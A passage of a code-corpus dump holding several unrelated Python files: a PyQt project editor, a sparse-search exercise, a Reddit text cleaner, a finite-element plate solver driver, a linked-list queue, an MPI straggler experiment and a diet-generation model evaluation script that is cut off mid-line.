self.prj_by_emp[emp_name]\n        self._load_list(projects)\n\n    def _rec_selected(self):\n        rec = Dataset.projects[self.lst.currentItem().text()]\n        self.ui.nameEdit.setText(rec.name)\n        self.ui.nameEdit.setToolTip(rec.name)\n        self.ui.nameEdit.setCursorPosition(0)\n        self.ui.nicknameEdit.setText(rec.nickname)\n        self.ui.firstMonthEdit.setText(Monkey.prettify(rec.first_month))\n        self.ui.lastMonthEdit.setText(Monkey.prettify(rec.last_month))\n        self.ui.notesEdit.setPlainText(rec.notes)\n        self.ui.billingEdit.setPlainText(rec.billing)\n        self.current_rec_id = rec.id\n\n    def _all_clicked(self):\n        self._load_list(Dataset.projects.keys())\n\n    def _add_clicked(self):\n        self.current_rec_id = None\n        self._clear_form()\n        self.ui.nameEdit.setFocus()\n        self.ui.addBtn.setEnabled(False)\n\n    def _clear_form(self):\n        self.ui.nameEdit.setText(None)\n        self.ui.nicknameEdit.setText(None)\n        self.ui.firstMonthEdit.setText(None)\n        self.ui.lastMonthEdit.setText(None)\n        self.ui.notesEdit.setPlainText(None)\n        self.ui.billingEdit.setPlainText(None)\n\n    def _save_clicked(self):\n        interval = self._validate_monkeys()\n        if not interval:\n            return\n        rec = Project([\n            
self.current_rec_id,\n            self.ui.nicknameEdit.text(),\n            self.ui.nameEdit.text(),\n            interval.first_month,\n            interval.last_month,\n            self.ui.notesEdit.toPlainText(),\n            self.ui.billingEdit.toPlainText()\n        ])\n        try:\n            rec.save()\n        except AllocatException as e:\n            QMessageBox.critical(QMessageBox(), 'Input Error', e.msg)\n            self.ui.nameEdit.setFocus()\n            return\n        Dataset.projects = Project.get_all()\n        self._load_list(Dataset.projects.keys(), rec.nickname)\n        self.ui.addBtn.setEnabled(True)\n\n    def _validate_monkeys(self):\n        first_month = Monkey.unslash(self.ui.firstMonthEdit.text())\n        last_month = Monkey.unslash(self.ui.lastMonthEdit.text())\n        if not Monkey.is_valid_pair(first_month, last_month):\n            msg = 'Invalid time frame: invalid month or first month after last month!'\n            QMessageBox.critical(QMessageBox(), 'Input Error', msg)\n            self.ui.firstMonthEdit.setFocus()\n            return None\n        return TimeInterval(first_month=first_month, last_month=last_month)\n\n    def _remove_clicked(self):\n        nickname = self.ui.nicknameEdit.text()\n        msg = 'Are you sure you want to remove project ' + nickname + '?'\n        reply = QMessageBox.question(QMessageBox(), 'Double check', msg)\n        if reply == QMessageBox.Yes:\n            rec = Dataset.projects[nickname]\n            rec.remove()\n            del Dataset.projects[nickname]\n            self._load_list(Dataset.projects.keys())\n\n    def _asns_clicked(self):\n        nickname = self.ui.nicknameEdit.text()\n        prj = Dataset.projects[nickname]\n        prj.set_assignments()\n\n        from views import AssignmentDialog\n        assignment_dialog = AssignmentDialog(prj)\n        assignment_dialog.exec_()\n\n","sub_path":"views/project_window.py","file_name":"project_window.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"437771451","text":"def sparse_search(arr, item):\n    def inner_search(arr, item, low, high):\n        middle = ((high - low) // 2) + low\n\n        if arr[middle] == \"\":\n            left = middle - 1\n            right = middle + 1\n            while True:\n                if left < low and right > high:\n                    return None\n                elif right <= high and arr[right] != \"\":\n                    middle = right\n                    break\n                elif left >= low and arr[left] != \"\":\n                    middle = left\n                    break\n                left -= 1\n                right += 1\n\n        if arr[middle] == item:\n            return middle\n        if arr[middle] > item:\n            return inner_search(arr, item, low, middle - 1)\n        if arr[middle] < item:\n            return inner_search(arr, item, middle + 1, high)\n\n    return inner_search(arr, item, 0, len(arr) - 1)\n\n\ndef sparse_search_hh(arr, target):\n    def helper(arr, left, right, target):\n        if left > right:\n            return None\n        mid = (left + right) // 2\n\n        if arr[mid] == \"\":\n            mid_left, mid_right = mid - 1, mid + 1\n            found = False\n            while mid_left >= left and mid_right <= right:  # expand outward in both directions\n                if arr[mid_left] != \"\":\n                    mid = mid_left\n                    found = True\n                    break\n                if arr[mid_right] != \"\":\n                    mid = mid_right\n                    found = True\n                    break\n                mid_left, mid_right = mid_left - 1, mid_right + 1\n            if not found:\n                return None\n\n        if arr[mid] == target:\n            return mid\n        elif arr[mid] > target:\n            return helper(arr, left, mid - 1, target)\n        else:\n            return helper(arr, mid + 1, right, target)\n    return helper(arr, 0, len(arr) - 1, target)\n\ntest_cases = [\n    (([\"a\", \"\", \"\", \"b\", \"\", \"c\", \"\", \"\", \"d\", \"\", \"\", \"\", \"\", \"e\", \"\"], \"d\"), 8),\n    (([\"a\", \"\", \"\", \"b\", \"\", \"c\", \"\", \"\", \"d\", \"\", \"\", \"\", \"\", \"e\", \"\"], \"f\"), None),\n    (([\"a\", \"\", \"\", \"b\", \"\", \"c\", \"\", \"\", \"d\", \"\", \"\", \"\", \"\", \"e\", \"\"], \"a\"), 0),\n]\n\ntestable_functions = 
[sparse_search, sparse_search_hh]\n\n\ndef test_sorted_search():\n    for function in testable_functions:\n        for (n, m), expected in test_cases:\n            calculated = function(n, m)\n            error_msg = f\"{function.__name__}: {calculated} != {expected}\"\n            assert function(n, m) == expected, error_msg\n\n\nif __name__ == \"__main__\":\n    test_sorted_search()\n","sub_path":"chapter_10/p05_sparse_search.py","file_name":"p05_sparse_search.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"246603626","text":"#Script for formatting text\nimport os, sys, re, string, nltk, enchant\nfrom nltk.corpus import stopwords\n\n\ndef main():\n\n\tsub_list = []\n\twith open(\"subreddits.txt\") as subreddits:\n\t\tfor subreddit in subreddits:\n\t\t\tsub_list.append(subreddit.rstrip())\n\n\tonlyAlphabet = re.compile(r'[^a-z \\']')\n\tstop = set(stopwords.words('english'))\n\td = enchant.Dict(\"en_US\")\n\tfoul_language = []\n\n\twith open(\"foul_language.txt\") as words:\n\t\tfor word in words:\n\t\t\tfoul_language.append(word.rstrip())\n\n\n\tdef cleanDoc(doc):\n\t\tstop_free = \" \".join([i for i in doc.lower().split() if i not in stop and i not in foul_language and d.check(i)])\n\t\tpunc_free = onlyAlphabet.sub('', stop_free)\n\t\treturn punc_free\n\n\n\tfor sub in sub_list:\n\t\ttxtlist_filename = sub + \"_textfiles.txt\"\n\t\ttxtlist_path = \"/home/kaislyn/RedditData/subreddits/%s/raw_text/\" % sub\t\t\t#Change path in this line\n\t\ttxtlist_filepath = os.path.join(txtlist_path, txtlist_filename)\n\t\t\n\t\toriginTextPath = \"/home/kaislyn/RedditData/subreddits/%s/raw_text/\" % sub\t\t#Change path in this line\n\t\tprocessedTextPath = \"/home/kaislyn/RedditData/subreddits/%s/processed_text/\" % sub\t#Change path in this line\n\n\n\t\tif not os.path.exists(processedTextPath):\n\t\t\tos.makedirs(processedTextPath)\n\t\n\t\twith open(txtlist_filepath) as posts:\n\t\t\tfor post in posts:\n\t\t\t\tdocs = []\n\n\t\t\t\tpostPath = os.path.join(originTextPath, post.rstrip())\n\t\t\t\tnewPath = os.path.join(processedTextPath, post.rstrip())\n\t\t\t\t\n\t\t\t\twith open(postPath) as txtfile:\n\t\t\t\t\tfor line in txtfile:\n\t\t\t\t\t\tdocs.append(line.rstrip())\n\n\t\t\t\tnfile = open(newPath, \"w+\")\n\t\t\t\tfor doc in docs:\n\t\t\t\t\tif len(cleanDoc(doc)) > 1:\n\t\t\t\t\t\tnfile.write(cleanDoc(doc) + 
\"\\n\")\n\t\t\t\tnfile.close()\n\t\t\t\t\n\t\t\t\t\n\t\n\n\n\nmain()\n","sub_path":"format_text.py","file_name":"format_text.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394476864","text":"\"\"\"Run\"\"\"\n\nimport os\nimport sys\nimport bmp\nimport prep\nimport tools\nimport solver\nimport postpro\nimport deformed\nimport gallery\nimport version\nimport prob\nimport copy\nimport plast\nimport gc\n\n#start timer\nTIME = tools.timer()\n\n#welcome message\nprint(\"\")\nprint(\"GRoT> ver. \" + version.get() + \", [Graficzny Rozwiązywacz Tarcz]\")\nprint(\"................................................\\n\")\n\n#read input file into list\nINP_FILE = open(\"input.txt\", \"r\")\nINP_FILE_LINES = INP_FILE.readlines()\n\nINP_LINES = []\n\n#create list of lines and words with no end line symbols\nfor i in range(len(INP_FILE_LINES)):\n INP_LINES.append(INP_FILE_LINES[i].rstrip().split(\" \"))\n\nINP_FILE.close()\n\ndef ksearch(keyword):\n for i in range(len(INP_LINES)):\n if (keyword in INP_LINES[i][0]) and (\"#\" not in INP_LINES[i][0]):\n return INP_LINES[i][1:]\n return [None]\n\nPROJ_NAME = ksearch(\"project\")[0]\n\nIMAGE = bmp.open_im(ksearch(\"bmp\")[0])\nGEOM = bmp.create_geom(IMAGE)\n\nNODES = GEOM[0]\nELES = GEOM[1].store()\nCONS = GEOM[2]\nBC_DICT = GEOM[3]\nPROB_DICT = GEOM[4]\n\nIMAGE, GEOM = None, None\n\nMAT = prep.materials(ELES)\nMAT.add(ksearch(\"mat\")[0])\nMAT.assignall(1)\nMAT.set_unit(ksearch(\"unit\")[0])\nMAT.set_scale(float(ksearch(\"scale\")[0]))\nSCALE = float(ksearch(\"scale\")[0])\n\nTHICKS = prep.thicks(ELES, MAT)\nTHICKS.add(float(ksearch(\"thickness\")[0]))\nTHICKS.assignall(1)\n\nloads_list = []\nfor i in range(len(INP_LINES)):\n if \"load\" in INP_LINES[i][0]:\n loads_list.append(i)\n\nfor i in range(len(loads_list)):\n CONS.load(BC_DICT[INP_LINES[loads_list[i]][5]],\n x=float(INP_LINES[loads_list[i]][2]),\n y=float(INP_LINES[loads_list[i]][4]))\n\nconstraints = CONS.store()\nCONS, BC_DICT = None, None\n\nSTATE = ksearch(\"problem\")[0]\nSOL = solver.Build(NODES, ELES, constraints, STATE, load_inc=1.0, scale=SCALE)\nNODES, constraints = None, None\n\nif not os.path.exists(\"results\" + os.sep + PROJ_NAME):\n os.makedirs(\"results\" + os.sep + PROJ_NAME)\n\nif ksearch(\"plast\")[0] != \"yes\":\n disp = SOL.direct()\n strains = SOL.strains_calc(disp)\n\nif ksearch(\"plast\")[0] == \"yes\":\n disp = SOL.direct_plast()\n disp_el = copy.copy(disp)\n strains = SOL.strains_calc(disp, msg=0)\n strains_el = copy.deepcopy(strains)\n iter_res = plast.Prepare(disp, strains, ELES)\n step_factor = iter_res.first_step(MAT)\n\nif (ksearch(\"plast\")[0] == \"yes\") and (step_factor < 1):\n load_step = step_factor\n steps_num = int(ksearch(\"plast\")[1])\n load_inc = (1 - step_factor) / (steps_num)\n flags_list = []\n eles_list = []\n sys.stdout.write(\"\\r\" + \"Nonlinear plasticity solver iteration [\" + str(1) + \\\n \" of \" + str(steps_num) + \"]\")\n sys.stdout.flush()\n\n file = open(\"results\" + os.sep + PROJ_NAME + os.sep + \"plast.txt\", \"w+\")\n file.write(\"meanRatio,\"+\"minRatio,\"+\"maxRatio,\"+\"newPLASTeles,\"+\"allPLASTeles,\"+\"plstrainACCUM,\"+\"plstrainSTEP\\n\")\n file.write(\"The ratio is a ratio of the calculated Huber stress to the yield stress for elements which have entered into plasticity\\n\")\n file.close()\n for i in range(steps_num):\n load_step += load_inc\n check_res = iter_res.out()\n # Runge Kutta 2nd order procedure\n SOL.plast_update([], 
load_inc / 2.0)\n disp = SOL.direct_plast()\n strains = SOL.strains_calc(disp, msg=0)\n halfstep_strains = iter_res.halfstep(strains)\n plast_res = plast.search(ELES, halfstep_strains, flags_list)\n\n eles_list = plast_res[0]\n flags_list = plast_res[1]\n stress2plast_list = plast_res[2] # for residuals check\n\n sys.stdout.write(\"\\r\" + \"Nonlinear plasticity solver iteration [\" + \\\n str(i + 1) + \" of \" + str(steps_num) + \"]\")\n sys.stdout.flush()\n\n STATE = ksearch(\"problem\")[0]\n SOL.plast_update(eles_list, load_inc)\n MAT.assignplast(eles_list)\n\n disp = SOL.direct_plast()\n strains = SOL.strains_calc(disp, msg=0)\n\n final_results = iter_res.store(MAT, disp, strains, flags_list)\n disp = final_results[0]\n strains = final_results[1]\n eff_pl_strains = final_results[2]\n eff_pl_strains_rate = final_results[3]\n\n # plast.txt file creation\n file = open(\"results\" + os.sep + PROJ_NAME + os.sep + \"plast.txt\", \"a\")\n s2plast_corrected = [] # to calculate actual ratio, not ratio in hafstep\n for val in stress2plast_list:\n val -= val * ((load_inc / 2.0) / (load_step - (load_inc / 2.0)))\n s2plast_corrected.append(val)\n if len(s2plast_corrected) == 0:\n s2plast_corrected.append(0)\n min_val = str(round(min(s2plast_corrected), 3))\n max_val = str(round(max(s2plast_corrected), 3))\n mean_val = str(round(sum(s2plast_corrected) / len(s2plast_corrected), 3))\n new_eles = str(len(eles_list))\n all_eles = str(len(flags_list))\n file.write(mean_val + \",\" + min_val + \",\" + max_val + \",\" + new_eles + \",\" + all_eles)\n file.write(\" \" + str(round(max(eff_pl_strains), 3)) + \",\" + str(round(max(eff_pl_strains_rate), 3)) + \"\\n\")\n file.close()\n print(\"\\nPlasticity analysis details [plast.txt] stored in results\" + os.sep + PROJ_NAME)\n print(\"\")\n # results storing\n check_res = iter_res.out()\n res_disp = iter_res.residual_disp(disp_el)\n res_strains = iter_res.residual_strains(strains_el)\n strains = iter_res.store_plstrain(strains)\n # print(\"\")\n\n disp_el, strains_el, iter_res, plast = None, None, None, None\n halfstep_strains, plast_res, final_results = None, None, None\ngc.collect()\n\ngallery_input_file = \"\"\n\nfor i in INP_FILE_LINES:\n if (i[0] != \"#\") and (len(i) != 1):\n gallery_input_file += \"\" + i + \"
\"\n\nprobe_color = ksearch(\"probe\")[0]\nif probe_color is not None:\n prob.write(probe_color, PROB_DICT, strains, PROJ_NAME, MAT)\n\nresults_list = []\ndesc_list = []\n\nres_d = ksearch(\"disp\")\nif res_d[0] is not None:\n post = postpro.Prepare(ELES, disp)\n\n for i in range(0, len(res_d)):\n sys.stdout.write(\"\\r\" + \"Plotted displacements results [\" + str(i + 1) + \\\n \" of \" + str(len(res_d)) + \"] to results\" + os.sep + PROJ_NAME + os.sep)\n sys.stdout.flush()\n res_name = post.save_dresults(res_d[i], PROJ_NAME)\n results_list.append(\"disp_\" + res_d[i] + \".png\")\n desc_list.append(res_name)\n post = None\n print(\"\")\n\nres_s = ksearch(\"stress\")\nif res_s[0] is not None:\n post2 = postpro.Prepare(ELES, strains)\n for i in range(0, len(res_s)):\n sys.stdout.write(\"\\r\" + \"Plotted stress and strains results [\" + str(i + 1) + \" of \" + \\\n str(len(res_s)) + \"] to results\" + os.sep + PROJ_NAME + os.sep)\n sys.stdout.flush()\n res_name = post2.save_sresults(res_s[i], PROJ_NAME)\n results_list.append(res_s[i] + \".png\")\n desc_list.append(res_name)\n print(\"\")\n\ndef_scale = ksearch(\"deformed\")[0]\nif def_scale is not None:\n post3 = deformed.Prepare(ELES, disp, float(def_scale))\n res_name = post3.save_deformed(\"deformed\", PROJ_NAME)\n results_list.append(\"deformed\" + \".png\")\n desc_list.append(res_name)\npost3 = None\ndisp = None\n\nif (ksearch(\"plast\")[0] == \"yes\") and (step_factor < 1):\n post4 = postpro.Prepare(ELES, res_disp)\n res_name = post4.save_dresults(\"res\", PROJ_NAME)\n results_list.append(\"disp_res.png\")\n desc_list.append(res_name)\n\n post4 = None\n post5 = postpro.Prepare(ELES, res_strains)\n res_name = post5.save_sresults(\"res_huber\", PROJ_NAME)\n results_list.append(\"res_huber\" + \".png\")\n desc_list.append(res_name)\n post5 = None\n res_name = post2.save_sresults(\"pl_strain\", PROJ_NAME)\n results_list.append(\"pl_strain\" + \".png\")\n desc_list.append(res_name)\n res_name = post2.save_sresults(\"h_stress\", PROJ_NAME)\n results_list.append(\"h_stress\" + \".png\")\n desc_list.append(res_name)\n post2 = None\n\n print(\"Results of plastic analysis stored in \" + \\\n \"results\" + os.sep + PROJ_NAME)\n\ngallery.save_gallery(PROJ_NAME, results_list, desc_list, gallery_input_file, version.get())\ngallery_path = \"results\" + os.sep + PROJ_NAME + os.sep + PROJ_NAME + \"_gallery.html\"\n\nprint(\"\")\nprint(\"Task finished in\", TIME.check())\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"330788509","text":"class Nodo:\r\n \"\"\"Esta classe representa um nodo de uma estrutura duplamente encadeada.\"\"\"\r\n def __init__(self, dado=0, proximo_nodo=None):\r\n self.dado = dado\r\n self.proximo = proximo_nodo\r\n\r\n def __repr__(self):\r\n return '%s -> %s' % (self.dado, self.proximo)\r\nclass Fila:\r\n \"\"\"Esta classe representa uma fila usando uma estrutura encadeada.\"\"\"\r\n def __init__(self):\r\n self.primeiro = None\r\n self.ultimo = None\r\n def __repr__(self):\r\n return \"[\" + str(self.primeiro) + \"]\"\r\n def insere(self, novo_dado):\r\n \"\"\"Insere um elemento no final da fila.\"\"\"\r\n novo_nodo = Nodo(novo_dado)\r\n if self.primeiro == None:\r\n self.primeiro = novo_nodo\r\n self.ultimo = novo_nodo\r\n else:\r\n self.ultimo.proximo = novo_nodo\r\n self.ultimo = novo_nodo\r\n def remove(self):\r\n \"\"\"Remove o último elemento da fila.\"\"\"\r\n self.primeiro = 
self.primeiro.proximo\r\n\r\nfila = Fila()\r\nprint(\"Fila vazia: \", fila)\r\n\r\nwhile Fila != True:\r\n menu = int(input(\"Escolha um dos elementos a seguir:\\n[1] Adicionar elemento\\n[2] Remover elemnto\\n[3] Imprimir fila\\n[0] Sair\\nDigite aqui de acordo com o numero correspondente:\"))\r\n if menu == 1:\r\n var = int(input(\"digite um valor: \"))\r\n# Insere elementos na fila.\r\n fila.insere(var)\r\n print(\"Insere o valor {0} final da fila: {1}\".format(var, fila), \"\\n\")\r\n\r\n elif menu == 2:\r\n if fila.primeiro == None:\r\n fila = Fila()\r\n print(\"Fila vazia: \", fila, \"\\n\")\r\n else:\r\n# Remove elementos da fila.\r\n fila.remove()\r\n print(\"Removendo elemento que está no começo da fila: \", fila, \"\\n\")\r\n elif menu == 3:\r\n print(\"A fila: \",(fila), \"\\n\")\r\n\r\n elif menu == 0:\r\n print(\"Fim do programa\")\r\n exit()\r\n","sub_path":"fila.py","file_name":"fila.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364372474","text":"import numpy as np\nfrom mpi4py import MPI\nimport time\nimport random\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nstatus = MPI.Status()\nsize = 1000\nminiComp = 10\nnumberOfWorkers = 20\nnumberOfIter = 20\ntreshold = 7\nprevRecvCounter =0\nnumberOfComp = 3\npm = 0\nX = np.random.rand( int(size/miniComp),size) * np.sqrt(1) # row=300, column 3000 matrix for miniComps\ncounter = 0\nlastTagCounter= 0\ntsleep=0.0005\np=0.2\n\ndef sendCheck(iterIndex, req):\n if iterIndex ==1:\n return True\n else:\n return MPI.Request.Test(req)\n\nif rank == pm:\n ts = time.time()\n message = np.zeros(1)\n for i in range (1,numberOfIter+2):\n message[0] = i+1\n Y = np.empty([size, 1])\n if i == numberOfIter+1:\n tf = time.time()\n print(tf - ts)\n while(lastTagCounter < numberOfWorkers):\n comm.Recv(Y, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag()==i:\n lastTagCounter += 1\n else:\n prevRecvCounter +=1\n else:\n while counter < treshold:\n comm.Recv(Y, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == i:\n counter += 1\n else:\n prevRecvCounter +=1\n counter = 0\n if i % 2 == 0:\n for k in range(1, numberOfWorkers + 1):\n comm.Send(message, dest=k)\n else:\n for k in range(numberOfWorkers, 0, -1):\n comm.Send(message, dest=k)\n print (\"Prev recvs counter: \", prevRecvCounter)\n\nelse:\n message = np.zeros(1)\n Y=np.zeros((size,1))\n sendMult=np.zeros((size,1))\n flag=1\n sleepFlag=1\n iterIndex = 1\n multCounter = 0\n sendCounter = 0\n req = comm.Irecv(message, source=pm)\n req2 = None\n while iterIndex <= numberOfIter+1:\n if iterIndex == numberOfIter +1:\n comm.Send(Y, dest=pm, tag=iterIndex)\n iterIndex += 1\n else:\n if sleepFlag !=1 :\n if random.uniform(0, 1) < p:\n time.sleep(tsleep)\n sleepFlag = 1\n if MPI.Request.Test(req) and iterIndex <=numberOfIter and sleepFlag: # resets if message recv\n flag = 1\n iterIndex += 1\n counter = 0\n sendMult = np.zeros((size, 1))\n sleepFlag=0\n if iterIndex <= numberOfIter:\n req = comm.Irecv(message, source=pm)\n if (counter 1500\n endPoint = int((multCounter % miniComp + 1) * (size / miniComp)) # multCounter=15 ==> 1800\n Y[\n startPoint:endPoint] = miniMult # change the Y values between (1500-1800,1) with minimult(300,1)\n multCounter += 1\n if multCounter >= miniComp and multCounter % miniComp == 0:\n sendMult += Y\n counter += 1\n if MPI.Request.Test(req) and iterIndex <=numberOfIter and sleepFlag: # resets if message recv\n iterIndex 
+= 1\n flag = 1\n counter = 0\n sendMult = np.zeros((size, 1))\n sleepFlag=0\n if iterIndex <= numberOfIter:\n req = comm.Irecv(message, source=pm)\n #print(\"message changed\")\n if counter == numberOfComp and flag and sleepFlag and sendCheck(iterIndex, req2):\n req2 = comm.Issend(sendMult, dest=pm, tag=iterIndex)\n #req2.wait()\n flag = 0\n","sub_path":"LCC.py","file_name":"LCC.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"515421708","text":"# %%\nimport sys\nsys.path.append(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code\")\nfrom Preprocessing import *\nfrom util import *\nfrom Model import *\nimport argparse\nparser = argparse.ArgumentParser(description='model, lr 입력')\nparser.add_argument('--num_epochs', type=int, required=True, help='num_epochs 입력')\nparser.add_argument('--lr', type=float, required=True, help='learning_rate 입력')\nargs = parser.parse_args()\n\n# %%\n'''\nTSNE Mapping\n'''\n\n## tsne map with generated diets 그리기 (복수의 방법론 비교)\nfrom os import listdir\nfrom os.path import isfile, join\ntarget_dir_list = [path + '/' + subdir for (path, dir, files) in os.walk('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code') for subdir in dir if \"tsne\" in subdir]\ntotal_nutrient_df = []\nmethod_label = []\nreward_dist_stack = np.empty([0, 13])\nnp.random.seed(None)\n\nfor cp_dir in target_dir_list:\n\n # 사전학습 모델을 활용하여 강화학습\n # pretrain 폴더에서 특정 시점 체크포인트 복원하기\n # 변수 초기화를 위한 random seed로서의 input, hidden_state, concat_state 생성\n encoder = Encoder(len(food_dict), BATCH_SIZE)\n init_input = np.zeros([BATCH_SIZE, 1])\n init_hidden = encoder.initialize_hidden_state()\n init_output, _ = encoder(init_input, init_hidden)\n\n # Decoder to predict food sequence\n decoder = Decoder(len(food_dict))\n decoder(init_input, init_hidden, init_output)\n\n # (1-3) 체크포인트에 기록된 인스턴스 지정\n checkpoint = tf.train.Checkpoint(encoder = encoder, decoder = decoder)\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Baselines/SCST/pretraining_SCST\"))\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Baselines/SCST/training_SCST_lr=0.001_epoch=100/0\"))\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Baselines/MIXER/training_lr=0.001_epoch=1000\"))\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Proposed/training_lr=0.001_epoch=5000_eb=10_bs=10\"))\n checkpoint.restore(tf.train.latest_checkpoint(cp_dir))\n\n encoder = checkpoint.encoder\n decoder = checkpoint.decoder\n\n true_total_reward = 0\n gen_total_reward = 0\n # total_nutrient_df_real = pd.DataFrame()\n total_nutrient_df_gen = pd.DataFrame()\n\n for batch in range(len(list(tf_dataset))):\n x = list(tf_dataset)[batch]\n sample_input = x[:, :x.shape[1] - 1]\n sample_enc_hidden = encoder.initialize_hidden_state()\n\n # 두 인코더의 컨텍스트 벡터 각각 뽑아주기\n sample_enc_output, sample_enc_hidden = encoder(sample_input, sample_enc_hidden)\n\n # 두 인코더의 컨텍스트 벡터 연결해주기\n sample_dec_hidden = copy.deepcopy(sample_enc_hidden)\n\n sample_seqs = np.empty((0, 1))\n sample_seqs = np.concatenate([sample_seqs, tf.reshape(sample_input[:, 0], shape = (-1, 1))])\n\n for j in range(15):\n sample_outputs, sample_dec_hidden, attention_weigths = decoder(sample_input[:, 
j], sample_dec_hidden, sample_enc_output)\n results = np.apply_along_axis(get_action, axis = 1, arr = sample_outputs, option = 'prob')\n next_token = tf.reshape(results[:, 0], shape = (-1, 1))\n sample_seqs = np.concatenate([sample_seqs, next_token], axis = 1)\n\n generated_file_name = \"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/\" + cp_dir.split('_')[-2] + \"_data_np.csv\"\n pd.DataFrame(sample_seqs).to_csv(generated_file_name)\n\n # 실제 식단과 생성 식단의 영양상태를 저장하여 t-sne 맵 만들기\n nutrient_real = np.apply_along_axis(get_score_vector, axis = 1, arr = np.array(x), nutrient_data = nutrient_data)\n nutrient_gen = np.apply_along_axis(get_score_vector, axis = 1, arr = sample_seqs, nutrient_data = nutrient_data)\n\n # total_nutrient_df_real = total_nutrient_df_real.append(pd.DataFrame(nutrient_real))\n total_nutrient_df_gen = total_nutrient_df_gen.append(pd.DataFrame(nutrient_gen))\n\n print(' ')\n print(' 정답 :', sequence_to_sentence(np.array(x), food_dict)[0])\n print(' 생성 :', sequence_to_sentence(sample_seqs, food_dict)[0])\n\n generated_file_name = \"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/\" + cp_dir.split('_')[-2] + \"_result.csv\"\n pd.DataFrame(sequence_to_sentence(sample_seqs, food_dict)).to_csv(generated_file_name, encoding = 'utf-8-sig')\n\n true_reward = get_reward_ver2(get_score_vector(x[0], nutrient_data), 0)[0]\n gen_reward = get_reward_ver2(get_score_vector(sample_seqs[0], nutrient_data), 0)[0]\n print(' ')\n print(' 정답의 보상 :', true_reward)\n print(' 생성의 보상 :', gen_reward)\n\n mean_true_reward = np.mean(np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_real, done = 0)[:, 0])\n mean_gen_reward = np.mean(np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_gen, done = 0)[:, 0])\n\n # 배치가 여러개 일 때 누적\n true_total_reward += mean_true_reward\n gen_total_reward += mean_gen_reward\n\n # 생성식단들의 reward\n reward_dist = np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_gen, done = 0)[:, 2].sum(axis = 0).reshape(1, -1)\n reward_dist_stack = np.append(reward_dist_stack, reward_dist, axis = 0)\n\n true_mean_reward = true_total_reward / len(list(tf_dataset))\n gen_mean_reward = gen_total_reward / len(list(tf_dataset))\n\n print('true_mean_reward :', true_mean_reward)\n print('gen_mean_reward :', gen_mean_reward)\n\n total_nutrient_df, method = make_matrix_for_tsne(total_nutrient_df_gen)\n\n# tsne 매핑 결과 보기\ntotal_nutrient_df_real = pd.DataFrame(nutrient_real)\ntsne_matrix = tsne_mapping_multiple_gen(total_nutrient_df_real, total_nutrient_df)\ntsne_plot(tsne_matrix, method)\n\n# %%\n'''\nHit rate 점수 책정\n'''\nfirst_element = np.where(np.array(list(food_dict.values())) == \"시작\")[0][0]\nlast_element = np.where(np.array(list(food_dict.values())) == \"종료\")[0][0]\n\n# 1) 실제\n# meal_hit_score(diet_data_np.astype('int'), category_data)\n# dish_hit_score(diet_data_np.astype('int'), category_data)\navg_real_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = diet_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_real_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = diet_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 2) MIP\n# MIP_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/julia_result.csv', index_col = 0)\nMIP_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/available_julia.csv', index_col = 
0)\nMIP_data_np = food_to_token(MIP_result, nutrient_data)\nfirst_column = np.repeat(first_element, MIP_data_np.shape[0]).reshape(-1, 1)\nlast_column = np.repeat(last_element, MIP_data_np.shape[0]).reshape(-1, 1)\nMIP_data_np = np.hstack([first_column, MIP_data_np, last_column])\n\n# meal_hit_score(MIP_data_np.astype('int'), category_data)\n# dish_hit_score(MIP_data_np.astype('int'), category_data)\navg_MIP_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = MIP_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_MIP_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = MIP_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 3) SCST\nSCST_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/SCST_data_np.csv', index_col = 0)\nSCST_data_np = np.array(SCST_result)\n\n# SCST_data_np = food_to_token(SCST_result, nutrient_data)\n# first_column = np.repeat(first_element, SCST_data_np.shape[0]).reshape(-1, 1)\n# last_column = np.repeat(last_element, SCST_data_np.shape[0]).reshape(-1, 1)\n# SCST_data_np = 